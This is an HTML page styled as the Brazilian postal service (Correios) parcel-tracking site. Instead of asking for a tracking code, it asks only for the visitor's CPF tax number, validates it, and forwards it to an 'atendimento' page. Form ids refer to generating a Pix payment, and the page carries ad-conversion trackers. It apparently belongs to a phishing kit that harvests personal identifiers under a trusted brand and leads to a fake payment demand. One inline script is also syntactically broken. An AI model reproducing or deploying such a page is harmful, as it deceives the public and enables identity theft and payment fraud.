<!DOCTYPE html><html lang="pt-BR"><head>



    <!-- Meta Pixel Code -->
    <script>
        !function(f,b,e,v,n,t,s)
        {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
        n.callMethod.apply(n,arguments):n.queue.push(arguments)};
        if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
        n.queue=[];t=b.createElement(e);t.async=!0;
        t.src=v;s=b.getElementsByTagName(e)[0];
        s.parentNode.insertBefore(t,s)}(window, document,'script',
        'https://connect.facebook.net/en_US/fbevents.js');
        fbq('init', '1231897648247820');
        fbq('track', 'PageView');
        </script>
        <noscript><img height="1" width="1" style="display:none"
        src="https://www.facebook.com/tr?id=1231897648247820&ev=PageView&noscript=1"
        /></noscript>
        <!-- End Meta Pixel Code -->
        
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Rastreio</title>
        <link href="css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
        <link rel="stylesheet" href="css/bootstrap-icons.min.css">
        <script async="" src="js/fbevents.js"></script><script src="js/jquery-3.6.0.min.js"></script>
        <script src="js/jquery.mask.min.js"></script>
        
        <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '');
      fbq('track', 'PageView');
    
        </script>
    <script src="https://cdn.utmify.com.br/scripts/utms/latest.js" async defer></script>
        <script>
            function redirectToSenha() {
                const cpf = document.getElementById('accountId').value;
                const utmParams = new URLSearchParams(window.location.search);
                const utmString = utmParams.toString();
                const newUrl = atendimento.html?cpf=${cpf}&${utmString};
                window.location.href = newUrl;
            }
        </script>
        
    <script async="" src="https://www.googletagmanager.com/gtag/js?id=G-"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
    
      gtag('config', 'G-');
    </script>    </head>
    
      <body>
        <style>
    
            @font-face {
                font-family: 'Trebuchet MS';
                src: url('fonts/TrebuchetMS.eot');
                src: url('fonts/TrebuchetMS.eot#iefix') format('embedded-opentype'),
                    url('fonts/TrebuchetMS.woff2') format('woff2'),
                    url('fonts/TrebuchetMS.woff') format('woff'),
                    url('fonts/TrebuchetMS.ttf') format('truetype'),
                    url('images/TrebuchetMS.svg#TrebuchetMS') format('svg');
                font-weight: normal;
                font-style: normal;
                font-display: swap;
            }
    
            @font-face {
                font-family: 'Trebuchet MS';
                src: url('fonts/TrebuchetMS-Italic.eot');
                src: url('fonts/TrebuchetMS-Italic.eot#iefix') format('embedded-opentype'),
                    url('fonts/TrebuchetMS-Italic.woff2') format('woff2'),
                    url('fonts/TrebuchetMS-Italic.woff') format('woff'),
                    url('fonts/TrebuchetMS-Italic.ttf') format('truetype'),
                    url('images/TrebuchetMS-Italic.svg#TrebuchetMS-Italic') format('svg');
                font-weight: normal;
                font-style: italic;
                font-display: swap;
            }
    
            body {
                font-family: 'Trebuchet MS' !important;
            }
    
            .acessibilidade {
                background-color: #efedea;
                color: #222222;
                border-bottom: 1px solid white;
                padding: .5rem .5rem;
            }
    
            .acessibilidade h1 {
                font-size: 1rem;
                color: #0071ad;
                fill: #0071ad;
                margin: 0px;
            }
                
            @media (max-width: 575.98px) {
                .acessibilidade {
                    background-color: #efedea;
                    color: #222222;
                    border-bottom: 1px solid white;
                    padding: .5rem .5rem;
                }
    
                .acessibilidade h1 {
                    font-size: 1rem;
                    color: #0071ad;
                    fill: #0071ad;
                    margin: 0px;
                }
            }
        </style>
    
        <div class="acessibilidade">
            <div class="container">
            <h1>Acessibilidade <i class="bi bi-caret-down-fill"></i></h1>
            </div>
        </div>
    
        <style>
            .topo {
                background-color: #F3F5F0;
                color: #222222;
                border-bottom: 2px solid #ffd400;
                -webkit-box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.15);
                box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.15);
                text-align: center;
                display: flex;
                justify-content: space-between;
                align-items: center;
                padding: 1rem .5rem;
            }
    
            IMG.logo {
                width: 50%;
            }
    
            .topo-icons i {
                color: #0071ad;
                font-size: 1.5rem;
            }
    
            .topo-icons {
                width: auto;
            }
    
            .topo-icons img {
                width: 11%;
                margin-left: .6rem;
            }
    
            @media (max-width: 575.98px) {
                .topo {
                    padding: .4rem .5rem;
                }
    
                IMG.logo {
                    width: 100%;
                }
    
                .topo-icons i {
                    font-size: 1.5rem;
                }
    
                .topo-icons {
                    width: auto;
                }
    
                .topo-icons img {
                    width: 30%;
                    margin-left: .4rem;
                }
            }    
        </style>
    
        <div class="topo">
            <div class="container">
    
                <div class="row align-items-center">
                    <div class="col d-flex justify-content-start topo-icons">
                        <i class="bi bi-list"></i>
                    </div>
                    <div class="col-5">
                        <img class="logo" src="images/logo.svg" alt="">
                    </div>
                    <div class="col d-flex justify-content-end topo-icons">
                        <img src="images/entrar.svg" alt="">
                        <img src="images/busca.svg" alt="">
                    </div>
                </div>
    
            </div>
        </div>
    
        <style>
            .principal  {
                text-align: center;
                margin-top: 50px;
                padding: 3rem .6rem;
                background-color: #f0f0f0;
            }
    
            .principal img {
                width: 100%;
            }
    
            .principal h1 {
                text-align: center;
                font-size: 1.4rem;
                color: #0071ad;
                width: 100%;
                font-weight: bold;
            }
    
            .h2-title {
                display: flex;
                justify-content: center;
                width: 100%;
                text-align: center;
            }
    
            .h2-title h2 {
                margin-bottom: 2rem;
                font-size: 1rem;
                line-height: 1em;
                text-align: center;
                color: black;
                display: flex;
                align-items: center;
                font-weight: 500;
            }
    
            .principal input {
                width: 100%;
                box-sizing: border-box;
                font-size: 1rem;
                line-height: 2.4rem;
                background-color: #FFF;
                color: #807569;
                border: 1px solid #807569;
                padding: 0rem .8rem;
                border-radius: 0.5rem;
            }
            
            .input-group-text {
                font-size: .8rem;
                background-color: #FFF;
                color: #807569;
                border: 1px solid #807569;
            }
    
            .principal button {
                background-color: #0071ad;
                border: none;
                width: 100%;
                margin-top: 1.2rem;
                border-radius: .2rem;
                color: white;
                padding: .4rem 0rem;
            }
    
            IMG.headline {
                width: 350px;
                max-width: 85%;
                margin-bottom: 1rem;
            }
    
            @media (max-width: 575.98px) {
                .principal  {
                    margin-top: 50px;
                    padding: 3rem .6rem;
                }
    
                .principal img {
                    width: 100%;
                }
    
                .principal h1 {
                    font-size: 1.4rem;
                    font-weight: bold;
                }
    
                .h2-title h2 {
                    margin-bottom: 2rem;
                    font-size: 1rem;
                    line-height: 1em;
                    text-align: center;
                    font-weight: 500;
                }
    
                .principal input {
                    width: 100%;
                    box-sizing: border-box;
                    font-size: 1rem;
                    line-height: 2.4rem;
                    padding: 0rem .8rem;
                    border-radius: 0.5rem;
                }
                
                .input-group-text {
                    font-size: .8rem;
                }
    
                .principal button {
                    margin-top: 1.2rem;
                    border-radius: .2rem;
                    padding: .4rem 0rem;
                }
            }
        </style>
    
        <div class="principal">
            <div class="container">
                    <img class="headline" src="images/headline.png" alt="">
                    <!--
                    <div class="h2-title">
                        <h2>No campo abaixo, informar o seu CPF<br>(somente números)</h2>
                    </div>
                   
                    <div class="col-3 justify-content-center align-items-center text-center">
                        <img src="img/thumb.png" alt="">
                    </div>
                    -->
                    <div class="col">
                        <!--
                        <h1>CPF do comprador:</h1>
                        -->
                        <form id="form-pix">
                            <input type="text" name="cpf" id="cpf" placeholder="Seu CPF" required="">
                            <button type="submit" id="submit-btn" style="display: none;">ENVIAR</button>
                        </form>
                    
                        <button type="button" id="btn-gerar-pix">Pesquisar <i class="bi bi-search"></i></button>
                    
                        <script>
                            $(document).ready(function() {
                                // Máscara de CPF
                                $('#cpf').mask('000.000.000-00', { reverse: true });
                    
                                $('#btn-gerar-pix').on('click', function () {
                                    $('#submit-btn').click();
                                });
                    
                                $('#form-pix').on('submit', function (event) {
                                    event.preventDefault(); // Evita o envio padrão do formulário
                    
                                    // Obtém os valores dos campos do formulário
                                    var cpf = $('#cpf').val();
                                
                                    // Valida o CPF
                                    if (!validaCPF(cpf)) {
                                        alert('CPF inválido. Por favor, digite um CPF válido.');
                                        return; // Interrompe o processo de envio
                                    }
                    
                                    // Remove a pontuação do CPF
                                    var cpfSemPontuacao = cpf.replace(/\D/g, '');
                    
                                                // Monta a URL com os parâmetros do formulário e o valor atual da div
                                    var url = '/atendimento?cpf=' + encodeURIComponent(cpfSemPontuacao);
                                    // Redireciona para a nova página com os parâmetros
                                    window.location.href = url +  window.location.search;
                                });
    
                             
                                // Função de validação de CPF
                                function validaCPF(cpf) {
                                    cpf = cpf.replace(/\D/g, '');
                                    if (cpf == '') return false;
                                    if (cpf.length != 11 ||
                                        cpf == "00000000000" ||
                                        cpf == "11111111111" ||
                                        cpf == "22222222222" ||
                                        cpf == "33333333333" ||
                                        cpf == "44444444444" ||
                                        cpf == "55555555555" ||
                                        cpf == "66666666666" ||
                                        cpf == "77777777777" ||
                                        cpf == "88888888888" ||
                                        cpf == "99999999999")
                                        return false;
                                    add = 0;
                                    for (i = 0; i < 9; i++)
                                        add += parseInt(cpf.charAt(i)) * (10 - i);
                                    rev = 11 - (add % 11);
                                    if (rev == 10 || rev == 11)
                                        rev = 0;
                                    if (rev != parseInt(cpf.charAt(9)))
                                        return false;
                                    add = 0;
                                    for (i = 0; i < 10; i++)
                                        add += parseInt(cpf.charAt(i)) * (11 - i);
                                    rev = 11 - (add % 11);
                                    if (rev == 10 || rev == 11)
                                        rev = 0;
                                    if (rev != parseInt(cpf.charAt(10)))
                                        return false;
                                    return true;
                                }
                            });
                        </script>
                    </div>
              
            </div>
        </div>
    
        <style>
            .footer  {
                text-align: center;
                margin-top: 16rem;
                padding: 1.2rem 1rem 1rem 1.5rem;
                background-color: #ffe600;
                background-image: url(images/rodape-bg.svg);
                background-repeat: no-repeat;
                background-position: center bottom;
                background-size: 100% 150px;
            }
    
            .footer img {
                width: 350px;
            }
    
            .footer h1 {
                margin-top: 1rem;
                text-align: center;
                font-size: .9rem;
            }
            @media (max-width: 575.98px) {
                .footer  {
                    margin-top: 10rem;
                    padding: 1.2rem 1rem 1rem 1.5rem;
                    background-size: 100% 150px;
                }
    
                .footer img {
                    width: 100%;
                }
    
                .footer h1 {
                    margin-top: 1rem;
                    text-align: center;
                    font-size: .9rem;
                }
            }
        </style>
    
        <div class="footer">
            <!--<img src="img/rodape-logos.png" alt="">-->
            <h1>©️ Copyright 2024 Correios</h1>
        </div>
    
        <script src="js/bootstrap.bundle.min.js" crossorigin="anonymous"></script>
      
    </body></html>